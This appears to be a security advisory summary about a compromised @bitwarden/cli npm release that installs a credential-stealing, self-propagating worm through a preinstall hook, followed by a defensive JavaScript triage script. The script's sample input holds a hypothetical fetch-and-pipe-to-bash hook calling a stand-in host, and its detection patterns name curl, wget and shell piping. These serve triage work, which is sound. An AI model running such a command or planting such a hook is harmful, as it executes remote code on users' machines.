Is Shai-Hulud Back? Compromised Bitwarden CLI Contains a Self-Propagating npm Worm
Version 2026.4.0 of the @bitwarden/cli npm package (about 78,000 weekly downloads) has been identified as malicious. The attacker bypassed Bitwarden's trusted publishing controls by compromising the CI/CD pipeline (publish-ci.yml), which allowed a malicious release to be published under the legitimate @bitwarden namespace. The package installs a multi-stage worm, 'Shai-Hulud: The Third Coming', via a preinstall hook: it downloads the Bun runtime, then executes a 10 MB obfuscated payload that harvests SSH keys, AWS/GCP/Azure credentials, npm tokens, Claude Code auth tokens, MCP config files, .env files, shell history, and more, and also queries cloud secret stores using whatever ambient credentials it finds. Stolen data is exfiltrated to a public GitHub repository created under the victim's own account, and the worm self-propagates by reusing stolen GitHub tokens. Two C2 endpoints are identified, one of them a fake Checkmarx domain. IOCs, including SHA256 hashes and commit-message patterns, are provided.
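As an added triage example (not code from the advisory, from Bitwarden, or from the worm itself), the script below walks a project's package-lock.json for the one release the summary names as malicious and flags npm lifecycle hooks whose commands look like the preinstall stage described above: fetching over HTTP, piping into a shell, or invoking the Bun runtime. The suspicious-command patterns are triage heuristics of my own, not the worm's literal hook text, and the lockfile and package.json inputs are constructed for the demo; the hook string in the sample is hypothetical.

```javascript
// Added example: triage a project for @bitwarden/cli 2026.4.0 and for
// install-time hooks of the kind the worm uses. Not the advisory's code.

const KNOWN_BAD = {
  "@bitwarden/cli": new Set(["2026.4.0"]), // only the version the page identifies
};

const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Triage heuristics (assumptions, not the worm's literal command): a hook that
// names the Bun runtime, pulls something over HTTP, pipes into a shell, or
// evaluates inline code deserves a human look before install scripts run.
const SUSPICIOUS = [
  { label: "bun-runtime", re: /\bbun\b/i },
  { label: "network-fetch", re: /\b(curl|wget)\b|https?:\/\//i },
  { label: "pipe-to-shell", re: /\|\s*(ba|z)?sh\b/ },
  { label: "inline-eval", re: /\beval\b|node\s+-e\b/ },
];

// Lockfile v2/v3 keys look like "node_modules/@scope/name"; strip the path prefix.
function packageNameFromKey(key) {
  return key.replace(/^.*node_modules\//, "");
}

// Flag known-bad versions and any dependency npm marked as having install scripts.
function auditLockfile(lock) {
  const findings = [];
  for (const [key, meta] of Object.entries(lock.packages || {})) {
    if (key === "") continue; // the root project entry
    const name = packageNameFromKey(key);
    if (KNOWN_BAD[name] && KNOWN_BAD[name].has(meta.version)) {
      findings.push({ type: "known-bad-version", name, version: meta.version, path: key });
    }
    if (meta.hasInstallScript) {
      findings.push({ type: "has-install-script", name, version: meta.version, path: key });
    }
  }
  return findings;
}

// Inspect one installed package.json for lifecycle hooks matching the heuristics.
function auditScripts(name, pkg) {
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = (pkg.scripts || {})[hook];
    if (!cmd) continue;
    const labels = SUSPICIOUS.filter((s) => s.re.test(cmd)).map((s) => s.label);
    if (labels.length) findings.push({ type: "suspicious-hook", name, hook, command: cmd, labels });
  }
  return findings;
}

// Combine both checks; `installed` maps package name -> its parsed package.json.
function auditProject(lock, installed) {
  const findings = auditLockfile(lock);
  for (const [name, pkg] of Object.entries(installed)) {
    findings.push(...auditScripts(name, pkg));
  }
  return findings;
}

// Constructed sample input: not a real lockfile and not the real malicious manifest.
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    "": { name: "demo-app", version: "1.0.0" },
    "node_modules/@bitwarden/cli": { version: "2026.4.0", hasInstallScript: true },
    "node_modules/left-pad": { version: "1.3.0" },
  },
};

const SAMPLE_INSTALLED = {
  "@bitwarden/cli": {
    name: "@bitwarden/cli",
    version: "2026.4.0",
    // Hypothetical hook text illustrating the fetch-then-run pattern, not the real one.
    scripts: { preinstall: "curl -fsSL https://example.invalid/bun.sh | bash && bun run setup.js" },
  },
  "left-pad": { name: "left-pad", version: "1.3.0", scripts: { test: "node test.js" } },
};

for (const f of auditProject(SAMPLE_LOCK, SAMPLE_INSTALLED)) {
  console.log(JSON.stringify(f));
}
```

Run it against a real project by loading package-lock.json and each dependency's node_modules/<name>/package.json in place of the constructed objects. While triaging, install with `npm ci --ignore-scripts` so that no preinstall hook executes before you have read it; the lockfile's `hasInstallScript` flag tells you which packages would have run one.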